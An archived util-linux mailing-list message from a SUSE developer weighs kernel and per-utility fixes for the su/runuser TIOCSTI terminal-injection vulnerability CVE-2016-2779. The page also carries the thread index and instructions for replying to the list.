From: Stanislav Brabec <sbrabec@suse.cz>
To: up201407890@alunos.dcc.fc.up.pt
Cc: util-linux@vger.kernel.org
Subject: Re: Fixing su + runuser vulnerability CVE-2016-2779
Date: Fri, 4 Mar 2016 17:13:57 +0100 [thread overview]
Message-ID: <56D9B445.5080808@suse.cz> (raw)
In-Reply-To: <56D8648F.60504@suse.cz>
On Mar 3, 2016 at 17:21 Stanislav Brabec wrote:
> On Mar 3, 2016 at 01:37 up201407890@alunos.dcc.fc.up.pt wrote:
>
>> On another note, grsecurity recently released a new feature named
>> GRKERNSEC_HARDEN_TTY that disallows the use of TIOCSTI to unprivileged
>> users unless the caller has CAP_SYS_ADMIN.
>
> This will fix all util-linux issues, but not chroot. There root inside
> the chroot escapes from chroot and calls commands outside.
>
We had a talk about this bug, and we found, that there is no quick and
100% safe fix.
Here are possibilities:
1) Quick kernel fix disabling TIOCSTI ioctl() for non-root, if the PID
of the terminal owner is not equal to PID of the calling process,
eventually use capabilities for the same.
Pros:
+ Fix in one place.
+ Fix all possible future abuses.
Cons:
- Many utilities are potentially affected and need testing.
- Some custom code could be affected. (I can imagine for example bar
code reader running with a dedicated UID, and pushing bar code to the
terminal. Such code will break for sure.)
2) Per utility fix using setsid().
Pros:
+ Prevents the exploit without uncertain side effects.
Cons:
- Each affected utility needs fix.
- Loss of job control will affect working style of many people.
Conclusion:
We need a different solution:
3) Introduce new terminal ioctl() or flag in the kernel. This flag will
block TIOCSTI (and possibly other dangerous actions). It will allow to
implement something like setsid(), but without side effects of job
control loss.
Pros:
+ No unwanted side effects at all.
Cons:
- Each affected utility needs fix.
We think, that only 3 will be safe and have no side effects.
Note:
Fixing character stealing described in previous mails is not covered by
any of these solutions. This could be possible safely only with a new
syscall revoke(), which was not yet accepted to the kernel.
--
Best Regards / S pozdravem,
Stanislav Brabec
software developer
---------------------------------------------------------------------
SUSE LINUX, s. r. o. e-mail: sbrabec@suse.com
Lihovarská 1060/12 tel: +49 911 7405384547
190 00 Praha 9 fax: +420 284 084 001
Czech Republic http://www.suse.cz/
PGP: 830B 40D5 9E05 35D8 5E27 6FA3 717C 209F A04F CD76
next prev parent reply other threads:[~2016-03-04 16:13 UTC|newest]
Thread overview: 19+ messages / expand[flat|nested] mbox.gz Atom feed top
2016-03-02 19:35 Fixing su + runuser vulnerability CVE-2016-2779 Stanislav Brabec
2016-03-02 23:39 ` Ángel González
2016-03-03 0:37 ` up201407890
2016-03-03 16:21 ` Stanislav Brabec
2016-03-04 16:13 ` Stanislav Brabec [this message]
2016-03-04 18:03 ` up201407890
2016-03-04 23:50 ` Ángel González
2016-03-08 16:33 ` Stanislav Brabec
2016-03-07 13:13 ` Karel Zak
2016-03-08 16:02 ` Stanislav Brabec
2016-09-29 14:40 ` Karel Zak
2016-10-02 13:16 ` Florian Weimer
2016-10-03 10:28 ` Karel Zak
2016-10-03 13:29 ` Karel Zak
2016-10-09 11:09 ` Florian Weimer
2016-10-03 15:04 ` Karel Zak
2016-10-03 15:48 ` Pádraig Brady
2016-10-03 16:25 ` Karel Zak
2016-10-11 14:19 ` Karel Zak
Reply instructions:
You may reply publicly to this message via plain-text email
using any one of the following methods:
* Save the following mbox file, import it into your mail client,
and reply-to-all from there: mbox
Avoid top-posting and favor interleaved quoting:
https://en.wikipedia.org/wiki/Posting_style#Interleaved_style
* Reply using the --to, --cc, and --in-reply-to
switches of git-send-email(1):
git send-email \
--in-reply-to=56D9B445.5080808@suse.cz \
--to=sbrabec@suse.cz \
--cc=up201407890@alunos.dcc.fc.up.pt \
--cc=util-linux@vger.kernel.org \
/path/to/YOUR_REPLY
https://kernel.org/pub/software/scm/git/docs/git-send-email.html
* If your mail client supports setting the In-Reply-To header
via mailto: links, try the mailto: link
Be sure your reply has a Subject: header at the top and a blank line
before the message body.
This is a public inbox, see mirroring instructions
for how to clone and mirror all data and code used for this inbox